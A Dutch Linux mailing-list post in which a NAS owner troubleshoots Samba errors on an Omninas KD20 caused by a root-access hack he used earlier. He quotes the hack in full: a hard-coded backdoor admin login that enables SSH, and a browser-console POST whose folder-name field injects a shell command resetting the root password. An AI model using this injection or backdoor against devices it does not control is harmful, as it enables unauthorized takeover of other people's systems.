[linux] Omninas, the continuing story

paai j.j.paijmans op gmail.com
Wo Dec 11 12:26:16 CET 2019

On 10-12-19 21:18, paai wrote:
> Nadat ik vorig jaar met jullie hulp heel, heel diep in de ingewanden
> van de Ominas (KD20) ben gedoken om het ding weer op poten te krijgen,
> heeft hij anderhalf jaar goed gefunctioneerd. Afgelopen week kreeg hij
> weer kuren en het leek me een goed idee de disks opnieuw te
> formatteren en te configureren. Omdat het twee verschillende disks
> zijn, en ze niet zo heel erg groot zijn, gebruik ik daarvoor de JBOD
> setup.
>
> Het vreemde is dat het allemaal goed lijkt te werken, maar ergens in
> het proces is de passwd file verloren gegaan of iets dergelijks. Geen
> [...]

Verder kijkend zie ik dat samba waarschijnlijk niet gestart wordt wegens
een error in de smb.conf file(s). Die heeft te maken met de hack die ik
gebruikte om root access te krijgen. Die hacjk creeert zo te zien een
directory onder /share met de naam 'xxxx'. Na het starten staat daar
overigens niets in.

MAAR...

In elk van de drie smb.conf files is een sectie toegevoegd. Die kan ik
weg-editen, en de directory xxxx verwijderen, maar na iedere boot staan
ze er weer en ze veroorzaken dus een error in samba

de drie files:

./usr/lib/smb.conf
./usr/hddapp/etc/samba/smb.conf
./initrd/etc/samba/smb.conf

en de toegevoegde sectie

[xxxx; (echo "foobar
foobar" | sudo passwd root)]
comment =
create mask = 0664
directory mask = 0775
force directory mode = 0775
directory security mask = 0775
force directory security mode = 0775
force group = nobody
path = /share//xxxx; (echo "foobar
foobar" | sudo passwd root)
valid users = admin
write list =
printable = no

De gebruike hack om root en ssh te krijgen:

    1. start ssh by Semmy/pawlak method: go to
http://192.168.xx.xx/admin/ssh.p
hp (user/pass: atonnas/backdoor) - check SSH, save;
     2. login to your NAS admin page, go to Share->Add folder;
     3. open your browser console and execute code:
     $.ajax({
     type:"POST",
     url: 'http://192.168.xx.xx/action/folder_action.php',
     cache: false,
     data: {
     folder_type: "new",
     foldername: "xxxx; (echo \"foobar\nfoobar\n\" | sudo passwd root)"
     },
     success:function(data){
     console.log(data)
     }